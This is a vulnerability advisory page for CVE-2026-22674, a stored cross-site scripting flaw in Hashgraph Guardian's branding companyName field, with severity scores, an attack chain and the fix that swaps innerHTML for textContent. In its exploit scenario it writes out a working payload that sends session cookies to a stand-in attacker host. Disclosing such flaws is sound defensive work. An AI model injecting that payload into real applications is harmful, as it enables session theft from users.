Skip to main content

Hashgraph Guardian CVE-2026-22674

| EUVDEUVD-2026-37952 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-06-18 VulnCheck GHSA-jqx7-93j3-2xqf
4.8
CVSS 4.0 · Vendor: VulnCheck
Share

Severity by source

Vendor (VulnCheck) PRIMARY
4.8 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
4.8 MEDIUM

Requires STANDARD_REGISTRY role (PR:H); stored payload auto-executes on victim page load (UI:R); scope changes to victims' browsers (S:C); low confidentiality and integrity impact consistent with XSS session exposure.

3.1 AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

Primary rating from Vendor (VulnCheck).

CVSS VectorVendor: VulnCheck

CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
High
User Interaction
P
Scope
X

Lifecycle Timeline

2
Source Code Evidence Fetched
Jun 18, 2026 - 22:16 vuln.today
Analysis Generated
Jun 18, 2026 - 22:16 vuln.today

DescriptionCVE.org

Hashgraph Guardian through 3.5.0, fixed in commit ba8c566, contains a stored cross-site scripting vulnerability that allows authenticated users with the STANDARD_REGISTRY role to inject malicious scripts by submitting a crafted companyName value via the branding configuration API endpoint. Attackers can exploit the unsanitized innerHTML assignment in the branding service to execute arbitrary JavaScript in the browser of every authenticated user on every page load.

AnalysisAI

Stored cross-site scripting in Hashgraph Guardian through 3.5.0 allows an authenticated user holding the STANDARD_REGISTRY role to inject persistent JavaScript payloads into the branding configuration's companyName field via the branding API endpoint. The injected script executes in every authenticated user's browser on every page load due to unsanitized innerHTML assignments in both the BrandingService and BrandingComponent Angular classes. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Authenticate as STANDARD_REGISTRY user
Delivery
Submit XSS payload as companyName via branding API
Exploit
Payload persisted in Guardian backend
Install
Victim loads any Guardian frontend page
C2
BrandingService renders companyName via innerHTML
Execute
Injected JavaScript executes in victim browser context
Impact
Session tokens or credentials exfiltrated

Vulnerability AssessmentAI

Exploitation Exploitation requires the attacker to hold the STANDARD_REGISTRY role within the Guardian application - a defined named role with authority over branding configuration, distinct from the administrator role. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 4.0 score of 4.8 with vector AV:N/AC:L/AT:N/PR:H/UI:P accurately represents the real-world risk profile. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker authenticated with the STANDARD_REGISTRY role submits a crafted companyName value such as `<img src=x onerror=fetch('https://attacker.com/?c='+document.cookie)>` via the Guardian branding configuration API. The payload is stored server-side; on every subsequent page load by any authenticated Guardian user, the Angular BrandingService renders the value via innerHTML, triggering the injected code and silently exfiltrating session cookies or tokens to an attacker-controlled endpoint. …
Remediation The primary fix is to apply commit ba8c566807848cf84360716438056d8d8d2c8362 (GitHub PR #6190), which replaces all three unsafe innerHTML assignments with textContent in branding.service.ts and branding.component.ts. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

CVE-2020-7049 HIGH POC
7.3 Jun 30

Nozomi Networks OS before 19.0.4 allows /#/network?tab=network_node_list.html CSV Injection. Rated high severity (CVSS 7

CVE-2020-15307 MEDIUM POC
6.1 Jun 30

Nozomi Guardian before 19.0.4 allows attackers to achieve stored XSS (in the web front end) by leveraging the ability to

CVE-2023-29245 CRITICAL
9.2 Sep 19

A SQL Injection vulnerability in Nozomi Networks Guardian and CMC, due to improper input validation in certain fields us

CVE-2026-31984 HIGH
8.7 Jul 09

Disk-exhaustion denial of service in Nozomi Networks Guardian and Central Management Console (CMC) lets a remote, unauth

CVE-2026-39911 HIGH
8.7 Apr 09

Authenticated Standard Registry users can execute arbitrary Node.js code in Hashgraph Guardian ≤3.5.0 through unsandboxe

CVE-2023-2567 HIGH
8.7 Sep 19

A SQL Injection vulnerability has been found in Nozomi Networks Guardian and CMC, due to improper input validation in ce

CVE-2023-23574 HIGH
8.7 Aug 09

A blind SQL Injection vulnerability in Nozomi Networks Guardian and CMC, due to improper input validation in the alerts_

CVE-2023-22378 HIGH
8.7 Aug 09

A blind SQL Injection vulnerability in Nozomi Networks Guardian and CMC, due to improper input validation in the sorting

CVE-2022-0551 HIGH
8.6 Mar 24

Improper Input Validation vulnerability in project file upload in Nozomi Networks Guardian and CMC allows an authenticat

CVE-2022-0550 HIGH
8.6 Mar 24

Improper Input Validation vulnerability in custom report logo upload in Nozomi Networks Guardian, and CMC allows an auth

CVE-2021-26725 HIGH
8.6 Feb 22

Path Traversal vulnerability when changing timezone using web GUI of Nozomi Networks Guardian, CMC allows an authenticat

CVE-2021-26724 HIGH
8.6 Feb 22

OS Command Injection vulnerability when changing date settings or hostname using web GUI of Nozomi Networks Guardian and

Share

CVE-2026-22674 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy